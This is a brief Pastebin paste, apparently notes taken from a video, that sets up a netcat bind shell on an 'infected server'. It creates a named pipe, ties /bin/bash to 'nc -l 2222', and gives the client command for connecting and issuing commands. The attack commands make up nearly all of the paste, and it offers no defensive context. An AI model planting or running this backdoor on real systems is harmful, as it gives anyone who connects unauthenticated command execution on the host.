Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # https://www.youtube.com/watch?v=katlU1_7Nro
- # 2 hours, 20 minutes in
- # Infected Server
- mknod backpipe p
- /bin/bash 0<backpipe | nc -l 2222 1>backpipe
- # Client
- nc <dest> 2222
- <commands
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement